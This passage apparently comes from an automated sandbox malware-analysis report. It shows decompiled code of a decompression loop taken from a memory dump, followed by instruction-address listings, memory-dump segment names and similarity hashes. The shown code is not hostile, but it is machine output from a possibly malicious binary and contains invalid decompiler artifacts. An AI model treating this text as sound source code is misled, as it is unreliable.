                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t156 = __ebp - 0x70;
                                                							 *_t156 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t156;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							while(1) {
                                                								L48:
                                                								__eflags = __ebx - 0x100;
                                                								if(__ebx >= 0x100) {
                                                									break;
                                                								}
                                                								__eax =  *(__ebp - 0x58);
                                                								__edx = __ebx + __ebx;
                                                								__ecx =  *(__ebp - 0x10);
                                                								__esi = __edx + __eax;
                                                								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                								__ax =  *__esi;
                                                								 *(__ebp - 0x54) = __esi;
                                                								__edi = __ax & 0x0000ffff;
                                                								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                								__eflags =  *(__ebp - 0xc) - __ecx;
                                                								if( *(__ebp - 0xc) >= __ecx) {
                                                									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                									__cx = __ax;
                                                									_t170 = __edx + 1; // 0x1
                                                									__ebx = _t170;
                                                									__cx = __ax >> 5;
                                                									__eflags = __eax;
                                                									 *__esi = __ax;
                                                								} else {
                                                									 *(__ebp - 0x10) = __ecx;
                                                									0x800 = 0x800 - __edi;
                                                									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                									__ebx = __ebx + __ebx;
                                                									 *__esi = __cx;
                                                								}
                                                								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                								 *(__ebp - 0x44) = __ebx;
                                                								if( *(__ebp - 0x10) >= 0x1000000) {
                                                									continue;
                                                								} else {
                                                									goto L46;
                                                								}
                                                							}
                                                							L54:
                                                							_t173 = __ebp - 0x34;
                                                							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                							__eflags =  *_t173;
                                                							goto L55;
                                                						case 0xf:
                                                							L58:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0xf;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t203 = __ebp - 0x70;
                                                							 *_t203 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t203;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							L60:
                                                							__eflags = __ebx - 0x100;
                                                							if(__ebx >= 0x100) {
                                                								L55:
                                                								__al =  *(__ebp - 0x44);
                                                								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                								goto L56;
                                                							}
                                                							L61:
                                                							__eax =  *(__ebp - 0x58);
                                                							__edx = __ebx + __ebx;
                                                							__ecx =  *(__ebp - 0x10);
                                                							__esi = __edx + __eax;
                                                							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                							__ax =  *__esi;
                                                							 *(__ebp - 0x54) = __esi;
                                                							__edi = __ax & 0x0000ffff;
                                                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                							__eflags =  *(__ebp - 0xc) - __ecx;
                                                							if( *(__ebp - 0xc) >= __ecx) {
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                								__cx = __ax;
                                                								_t217 = __edx + 1; // 0x1
                                                								__ebx = _t217;
                                                								__cx = __ax >> 5;
                                                								__eflags = __eax;
                                                								 *__esi = __ax;
                                                							} else {
                                                								 *(__ebp - 0x10) = __ecx;
                                                								0x800 = 0x800 - __edi;
                                                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                							 *(__ebp - 0x44) = __ebx;
                                                							if( *(__ebp - 0x10) >= 0x1000000) {
                                                								goto L60;
                                                							} else {
                                                								goto L58;
                                                							}
                                                						case 0x10:
                                                							L109:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0x10;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t365 = __ebp - 0x70;
                                                							 *_t365 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t365;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							goto L111;
                                                						case 0x11:
                                                							goto L69;
                                                						case 0x12:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 0x58);
                                                								 *(__ebp - 0x84) = 0x13;
                                                								__esi =  *(__ebp - 0x58) + 2;
                                                								goto L132;
                                                							}
                                                							__eax =  *(__ebp - 0x4c);
                                                							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                							__ecx =  *(__ebp - 0x58);
                                                							__eax =  *(__ebp - 0x4c) << 4;
                                                							__eflags = __eax;
                                                							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                							goto L130;
                                                						case 0x13:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								_t469 = __ebp - 0x58;
                                                								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                								__eflags =  *_t469;
                                                								 *(__ebp - 0x30) = 0x10;
                                                								 *(__ebp - 0x40) = 8;
                                                								L144:
                                                								 *(__ebp - 0x7c) = 0x14;
                                                								goto L145;
                                                							}
                                                							__eax =  *(__ebp - 0x4c);
                                                							__ecx =  *(__ebp - 0x58);
                                                							__eax =  *(__ebp - 0x4c) << 4;
                                                							 *(__ebp - 0x30) = 8;
                                                							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                							L130:
                                                							 *(__ebp - 0x58) = __eax;
                                                							 *(__ebp - 0x40) = 3;
                                                							goto L144;
                                                						case 0x14:
                                                							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                							__eax =  *(__ebp - 0x80);
                                                							goto L140;
                                                						case 0x15:
                                                							__eax = 0;
                                                							__eflags =  *(__ebp - 0x38) - 7;
                                                							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                							__al = __al & 0x000000fd;
                                                							__eax = (__eflags >= 0) - 1 + 0xb;
                                                							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                							goto L120;
                                                						case 0x16:
                                                							__eax =  *(__ebp - 0x30);
                                                							__eflags = __eax - 4;
                                                							if(__eax >= 4) {
                                                								_push(3);
                                                								_pop(__eax);
                                                							}
                                                							__ecx =  *(__ebp - 4);
                                                							 *(__ebp - 0x40) = 6;
                                                							__eax = __eax << 7;
                                                							 *(__ebp - 0x7c) = 0x19;
                                                							 *(__ebp - 0x58) = __eax;
                                                							goto L145;
                                                						case 0x17:
                                                							L145:
                                                							__eax =  *(__ebp - 0x40);
                                                							 *(__ebp - 0x50) = 1;
                                                							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                							goto L149;
                                                						case 0x18:
                                                							L146:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0x18;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t484 = __ebp - 0x70;
                                                							 *_t484 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t484;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							L148:
                                                							_t487 = __ebp - 0x48;
                                                							 *_t487 =  *(__ebp - 0x48) - 1;
                                                							__eflags =  *_t487;
                                                							L149:
                                                							__eflags =  *(__ebp - 0x48);
                                                							if( *(__ebp - 0x48) <= 0) {
                                                								__ecx =  *(__ebp - 0x40);
                                                								__ebx =  *(__ebp - 0x50);
                                                								0 = 1;
                                                								__eax = 1 << __cl;
                                                								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                								__eax =  *(__ebp - 0x7c);
                                                								 *(__ebp - 0x44) = __ebx;
                                                								goto L140;
                                                							}
                                                							__eax =  *(__ebp - 0x50);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                							__eax =  *(__ebp - 0x58);
                                                							__esi = __edx + __eax;
                                                							 *(__ebp - 0x54) = __esi;
                                                							__ax =  *__esi;
                                                							__edi = __ax & 0x0000ffff;
                                                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                							__eflags =  *(__ebp - 0xc) - __ecx;
                                                							if( *(__ebp - 0xc) >= __ecx) {
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                								__cx = __ax;
                                                								__cx = __ax >> 5;
                                                								__eax = __eax - __ecx;
                                                								__edx = __edx + 1;
                                                								__eflags = __edx;
                                                								 *__esi = __ax;
                                                								 *(__ebp - 0x50) = __edx;
                                                							} else {
                                                								 *(__ebp - 0x10) = __ecx;
                                                								0x800 = 0x800 - __edi;
                                                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                							if( *(__ebp - 0x10) >= 0x1000000) {
                                                								goto L148;
                                                							} else {
                                                								goto L146;
                                                							}
                                                						case 0x19:
                                                							__eflags = __ebx - 4;
                                                							if(__ebx < 4) {
                                                								 *(__ebp - 0x2c) = __ebx;
                                                								L119:
                                                								_t393 = __ebp - 0x2c;
                                                								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                								__eflags =  *_t393;
                                                								L120:
                                                								__eax =  *(__ebp - 0x2c);
                                                								__eflags = __eax;
                                                								if(__eax == 0) {
                                                									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                									goto L170;
                                                								}
                                                								__eflags = __eax -  *(__ebp - 0x60);
                                                								if(__eax >  *(__ebp - 0x60)) {
                                                									goto L171;
                                                								}
                                                								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                								__eax =  *(__ebp - 0x30);
                                                								_t400 = __ebp - 0x60;
                                                								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                								__eflags =  *_t400;
                                                								goto L123;
                                                							}
                                                							__ecx = __ebx;
                                                							__eax = __ebx;
                                                							__ecx = __ebx >> 1;
                                                							__eax = __ebx & 0x00000001;
                                                							__ecx = (__ebx >> 1) - 1;
                                                							__al = __al | 0x00000002;
                                                							__eax = (__ebx & 0x00000001) << __cl;
                                                							__eflags = __ebx - 0xe;
                                                							 *(__ebp - 0x2c) = __eax;
                                                							if(__ebx >= 0xe) {
                                                								__ebx = 0;
                                                								 *(__ebp - 0x48) = __ecx;
                                                								L102:
                                                								__eflags =  *(__ebp - 0x48);
                                                								if( *(__ebp - 0x48) <= 0) {
                                                									__eax = __eax + __ebx;
                                                									 *(__ebp - 0x40) = 4;
                                                									 *(__ebp - 0x2c) = __eax;
                                                									__eax =  *(__ebp - 4);
                                                									__eax =  *(__ebp - 4) + 0x644;
                                                									__eflags = __eax;
                                                									L108:
                                                									__ebx = 0;
                                                									 *(__ebp - 0x58) = __eax;
                                                									 *(__ebp - 0x50) = 1;
                                                									 *(__ebp - 0x44) = 0;
                                                									 *(__ebp - 0x48) = 0;
                                                									L112:
                                                									__eax =  *(__ebp - 0x40);
                                                									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                										_t391 = __ebp - 0x2c;
                                                										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                										__eflags =  *_t391;
                                                										goto L119;
                                                									}
                                                									__eax =  *(__ebp - 0x50);
                                                									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                									__eax =  *(__ebp - 0x58);
                                                									__esi = __edi + __eax;
                                                									 *(__ebp - 0x54) = __esi;
                                                									__ax =  *__esi;
                                                									__ecx = __ax & 0x0000ffff;
                                                									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                									__eflags =  *(__ebp - 0xc) - __edx;
                                                									if( *(__ebp - 0xc) >= __edx) {
                                                										__ecx = 0;
                                                										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                										__ecx = 1;
                                                										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                										__ebx = 1;
                                                										__ecx =  *(__ebp - 0x48);
                                                										__ebx = 1 << __cl;
                                                										__ecx = 1 << __cl;
                                                										__ebx =  *(__ebp - 0x44);
                                                										__ebx =  *(__ebp - 0x44) | __ecx;
                                                										__cx = __ax;
                                                										__cx = __ax >> 5;
                                                										__eax = __eax - __ecx;
                                                										__edi = __edi + 1;
                                                										__eflags = __edi;
                                                										 *(__ebp - 0x44) = __ebx;
                                                										 *__esi = __ax;
                                                										 *(__ebp - 0x50) = __edi;
                                                									} else {
                                                										 *(__ebp - 0x10) = __edx;
                                                										0x800 = 0x800 - __ecx;
                                                										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                										 *__esi = __dx;
                                                									}
                                                									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                									if( *(__ebp - 0x10) >= 0x1000000) {
                                                										L111:
                                                										_t368 = __ebp - 0x48;
                                                										 *_t368 =  *(__ebp - 0x48) + 1;
                                                										__eflags =  *_t368;
                                                										goto L112;
                                                									} else {
                                                										goto L109;
                                                									}
                                                								}
                                                								__ecx =  *(__ebp - 0xc);
                                                								__ebx = __ebx + __ebx;
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                								 *(__ebp - 0x44) = __ebx;
                                                								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                									__ecx =  *(__ebp - 0x10);
                                                									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                									__ebx = __ebx | 0x00000001;
                                                									__eflags = __ebx;
                                                									 *(__ebp - 0x44) = __ebx;
                                                								}
                                                								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                								if( *(__ebp - 0x10) >= 0x1000000) {
                                                									L101:
                                                									_t338 = __ebp - 0x48;
                                                									 *_t338 =  *(__ebp - 0x48) - 1;
                                                									__eflags =  *_t338;
                                                									goto L102;
                                                								} else {
                                                									goto L99;
                                                								}
                                                							}
                                                							__edx =  *(__ebp - 4);
                                                							__eax = __eax - __ebx;
                                                							 *(__ebp - 0x40) = __ecx;
                                                							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                							goto L108;
                                                						case 0x1a:
                                                							L56:
                                                							__eflags =  *(__ebp - 0x64);
                                                							if( *(__ebp - 0x64) == 0) {
                                                								 *(__ebp - 0x88) = 0x1a;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x68);
                                                							__al =  *(__ebp - 0x5c);
                                                							__edx =  *(__ebp - 8);
                                                							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                							 *( *(__ebp - 0x68)) = __al;
                                                							__ecx =  *(__ebp - 0x14);
                                                							 *(__ecx +  *(__ebp - 8)) = __al;
                                                							__eax = __ecx + 1;
                                                							__edx = 0;
                                                							_t192 = __eax %  *(__ebp - 0x74);
                                                							__eax = __eax /  *(__ebp - 0x74);
                                                							__edx = _t192;
                                                							goto L79;
                                                						case 0x1b:
                                                							goto L75;
                                                						case 0x1c:
                                                							while(1) {
                                                								L123:
                                                								__eflags =  *(__ebp - 0x64);
                                                								if( *(__ebp - 0x64) == 0) {
                                                									break;
                                                								}
                                                								__eax =  *(__ebp - 0x14);
                                                								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                								__eflags = __eax -  *(__ebp - 0x74);
                                                								if(__eax >=  *(__ebp - 0x74)) {
                                                									__eax = __eax +  *(__ebp - 0x74);
                                                									__eflags = __eax;
                                                								}
                                                								__edx =  *(__ebp - 8);
                                                								__cl =  *(__eax + __edx);
                                                								__eax =  *(__ebp - 0x14);
                                                								 *(__ebp - 0x5c) = __cl;
                                                								 *(__eax + __edx) = __cl;
                                                								__eax = __eax + 1;
                                                								__edx = 0;
                                                								_t414 = __eax %  *(__ebp - 0x74);
                                                								__eax = __eax /  *(__ebp - 0x74);
                                                								__edx = _t414;
                                                								__eax =  *(__ebp - 0x68);
                                                								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                								__eflags =  *(__ebp - 0x30);
                                                								 *( *(__ebp - 0x68)) = __cl;
                                                								 *(__ebp - 0x14) = _t414;
                                                								if( *(__ebp - 0x30) > 0) {
                                                									continue;
                                                								} else {
                                                									goto L80;
                                                								}
                                                							}
                                                							 *(__ebp - 0x88) = 0x1c;
                                                							goto L170;
                                                					}
                                                				}
                                                			}













                                                0x004064b8
                                                0x004064ba
                                                0x004064bd
                                                0x004064c0
                                                0x004064c3
                                                0x004064c3
                                                0x004064c8
                                                0x00000000
                                                0x004064c8
                                                0x00406479
                                                0x0040647c
                                                0x0040647f
                                                0x00406489
                                                0x00000000
                                                0x00000000
                                                0x004064dd
                                                0x004064e1
                                                0x00406504
                                                0x00406507
                                                0x0040650a
                                                0x00406514
                                                0x004064e3
                                                0x004064e3
                                                0x004064e6
                                                0x004064e9
                                                0x004064ec
                                                0x004064f9
                                                0x004064fc
                                                0x004064fc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406591
                                                0x00406595
                                                0x0040659c
                                                0x0040659f
                                                0x004065a2
                                                0x004065ac
                                                0x00000000
                                                0x004065ac
                                                0x00406597
                                                0x00000000
                                                0x00000000
                                                0x004065b8
                                                0x004065bc
                                                0x004065c3
                                                0x004065c6
                                                0x004065c9
                                                0x004065be
                                                0x004065be
                                                0x004065be
                                                0x004065cc
                                                0x004065cf
                                                0x004065d2
                                                0x004065d2
                                                0x004065d5
                                                0x004065d8
                                                0x00000000
                                                0x00000000
                                                0x00406678
                                                0x00406678
                                                0x0040667c
                                                0x00406a1a
                                                0x00000000
                                                0x00406a1a
                                                0x00406682
                                                0x00406685
                                                0x00406688
                                                0x0040668c
                                                0x0040668f
                                                0x00406695
                                                0x00406697
                                                0x00406697
                                                0x00406697
                                                0x0040669a
                                                0x0040669d
                                                0x00000000
                                                0x00000000
                                                0x0040626d
                                                0x0040626d
                                                0x00406271
                                                0x004069de
                                                0x00000000
                                                0x004069de
                                                0x00406277
                                                0x0040627a
                                                0x0040627d
                                                0x00406281
                                                0x00406284
                                                0x0040628a
                                                0x0040628c
                                                0x0040628c
                                                0x0040628c
                                                0x0040628f
                                                0x00406292
                                                0x00406292
                                                0x00406295
                                                0x00406298
                                                0x00000000
                                                0x00000000
                                                0x0040629e
                                                0x004062a4
                                                0x00000000
                                                0x00000000
                                                0x004062aa
                                                0x004062aa
                                                0x004062ae
                                                0x004062b1
                                                0x004062b4
                                                0x004062b7
                                                0x004062ba
                                                0x004062bb
                                                0x004062be
                                                0x004062c0
                                                0x004062c6
                                                0x004062c9
                                                0x004062cc
                                                0x004062cf
                                                0x004062d2
                                                0x004062d5
                                                0x004062d8
                                                0x004062f4
                                                0x004062f7
                                                0x004062fa
                                                0x004062fd
                                                0x00406304
                                                0x00406308
                                                0x0040630a
                                                0x0040630e
                                                0x004062da
                                                0x004062da
                                                0x004062de
                                                0x004062e6
                                                0x004062eb
                                                0x004062ed
                                                0x004062ef
                                                0x004062ef
                                                0x00406311
                                                0x00406318
                                                0x0040631b
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406326
                                                0x00406326
                                                0x0040632a
                                                0x004069ea
                                                0x00000000
                                                0x004069ea
                                                0x00406330
                                                0x00406333
                                                0x00406336
                                                0x0040633a
                                                0x0040633d
                                                0x00406343
                                                0x00406345
                                                0x00406345
                                                0x00406345
                                                0x00406348
                                                0x0040634b
                                                0x0040634b
                                                0x0040634b
                                                0x00406351
                                                0x00000000
                                                0x00000000
                                                0x00406353
                                                0x00406356
                                                0x00406359
                                                0x0040635c
                                                0x0040635f
                                                0x00406362
                                                0x00406365
                                                0x00406368
                                                0x0040636b
                                                0x0040636e
                                                0x00406371
                                                0x00406389
                                                0x0040638c
                                                0x0040638f
                                                0x00406392
                                                0x00406392
                                                0x00406395
                                                0x00406399
                                                0x0040639b
                                                0x00406373
                                                0x00406373
                                                0x0040637b
                                                0x00406380
                                                0x00406382
                                                0x00406384
                                                0x00406384
                                                0x0040639e
                                                0x004063a5
                                                0x004063a8
                                                0x00000000
                                                0x004063aa
                                                0x00000000
                                                0x004063aa
                                                0x004063a8
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x00000000
                                                0x00000000
                                                0x004063ea
                                                0x004063ea
                                                0x004063ee
                                                0x004069f6
                                                0x00000000
                                                0x004069f6
                                                0x004063f4
                                                0x004063f7
                                                0x004063fa
                                                0x004063fe
                                                0x00406401
                                                0x00406407
                                                0x00406409
                                                0x00406409
                                                0x00406409
                                                0x0040640c
                                                0x0040640f
                                                0x0040640f
                                                0x00406415
                                                0x004063b3
                                                0x004063b3
                                                0x004063b6
                                                0x00000000
                                                0x004063b6
                                                0x00406417
                                                0x00406417
                                                0x0040641a
                                                0x0040641d
                                                0x00406420
                                                0x00406423
                                                0x00406426
                                                0x00406429
                                                0x0040642c
                                                0x0040642f
                                                0x00406432
                                                0x00406435
                                                0x0040644d
                                                0x00406450
                                                0x00406453
                                                0x00406456
                                                0x00406456
                                                0x00406459
                                                0x0040645d
                                                0x0040645f
                                                0x00406437
                                                0x00406437
                                                0x0040643f
                                                0x00406444
                                                0x00406446
                                                0x00406448
                                                0x00406448
                                                0x00406462
                                                0x00406469
                                                0x0040646c
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x004066fb
                                                0x004066fb
                                                0x004066ff
                                                0x00406a26
                                                0x00000000
                                                0x00406a26
                                                0x00406705
                                                0x00406708
                                                0x0040670b
                                                0x0040670f
                                                0x00406712
                                                0x00406718
                                                0x0040671a
                                                0x0040671a
                                                0x0040671a
                                                0x0040671d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040680a
                                                0x0040680e
                                                0x00406830
                                                0x00406833
                                                0x0040683d
                                                0x00000000
                                                0x0040683d
                                                0x00406810
                                                0x00406813
                                                0x00406817
                                                0x0040681a
                                                0x0040681a
                                                0x0040681d
                                                0x00000000
                                                0x00000000
                                                0x004068c7
                                                0x004068cb
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068f0
                                                0x004068f7
                                                0x004068fe
                                                0x004068fe
                                                0x00000000
                                                0x004068fe
                                                0x004068cd
                                                0x004068d0
                                                0x004068d3
                                                0x004068d6
                                                0x004068dd
                                                0x00406821
                                                0x00406821
                                                0x00406824
                                                0x00000000
                                                0x00000000
                                                0x004069b8
                                                0x004069bb
                                                0x00000000
                                                0x00000000
                                                0x004065f2
                                                0x004065f4
                                                0x004065fb
                                                0x004065fc
                                                0x004065fe
                                                0x00406601
                                                0x00000000
                                                0x00000000
                                                0x00406609
                                                0x0040660c
                                                0x0040660f
                                                0x00406611
                                                0x00406613
                                                0x00406613
                                                0x00406614
                                                0x00406617
                                                0x0040661e
                                                0x00406621
                                                0x0040662f
                                                0x00000000
                                                0x00000000
                                                0x00406905
                                                0x00406905
                                                0x00406908
                                                0x0040690f
                                                0x00000000
                                                0x00000000
                                                0x00406914
                                                0x00406914
                                                0x00406918
                                                0x00406a50
                                                0x00000000
                                                0x00406a50
                                                0x0040691e
                                                0x00406921
                                                0x00406924
                                                0x00406928
                                                0x0040692b
                                                0x00406931
                                                0x00406933
                                                0x00406933
                                                0x00406933
                                                0x00406936
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x0040693c
                                                0x0040693c
                                                0x00406940
                                                0x004069a0
                                                0x004069a3
                                                0x004069a8
                                                0x004069a9
                                                0x004069ab
                                                0x004069ad
                                                0x004069b0
                                                0x00000000
                                                0x004069b0
                                                0x00406942
                                                0x00406948
                                                0x0040694b
                                                0x0040694e
                                                0x00406951
                                                0x00406954
                                                0x00406957
                                                0x0040695a
                                                0x0040695d
                                                0x00406960
                                                0x00406963
                                                0x0040697c
                                                0x0040697f
                                                0x00406982
                                                0x00406985
                                                0x00406989
                                                0x0040698b
                                                0x0040698b
                                                0x0040698c
                                                0x0040698f
                                                0x00406965
                                                0x00406965
                                                0x0040696d
                                                0x00406972
                                                0x00406974
                                                0x00406977
                                                0x00406977
                                                0x00406992
                                                0x00406999
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x00406637
                                                0x0040663a
                                                0x00406670
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a3
                                                0x004067a3
                                                0x004067a6
                                                0x004067a8
                                                0x00406a32
                                                0x00000000
                                                0x00406a32
                                                0x004067ae
                                                0x004067b1
                                                0x00000000
                                                0x00000000
                                                0x004067b7
                                                0x004067bb
                                                0x004067be
                                                0x004067be
                                                0x004067be
                                                0x00000000
                                                0x004067be
                                                0x0040663c
                                                0x0040663e
                                                0x00406640
                                                0x00406642
                                                0x00406645
                                                0x00406646
                                                0x00406648
                                                0x0040664a
                                                0x0040664d
                                                0x00406650
                                                0x00406666
                                                0x0040666b
                                                0x004066a3
                                                0x004066a3
                                                0x004066a7
                                                0x004066d3
                                                0x004066d5
                                                0x004066dc
                                                0x004066df
                                                0x004066e2
                                                0x004066e2
                                                0x004066e7
                                                0x004066e7
                                                0x004066e9
                                                0x004066ec
                                                0x004066f3
                                                0x004066f6
                                                0x00406723
                                                0x00406723
                                                0x00406726

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                                                • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00406025(void* __ecx) {
                                                				void* _v8;
                                                				void* _v12;
                                                				signed int _v16;
                                                				unsigned int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				signed int _v64;
                                                				signed int _v68;
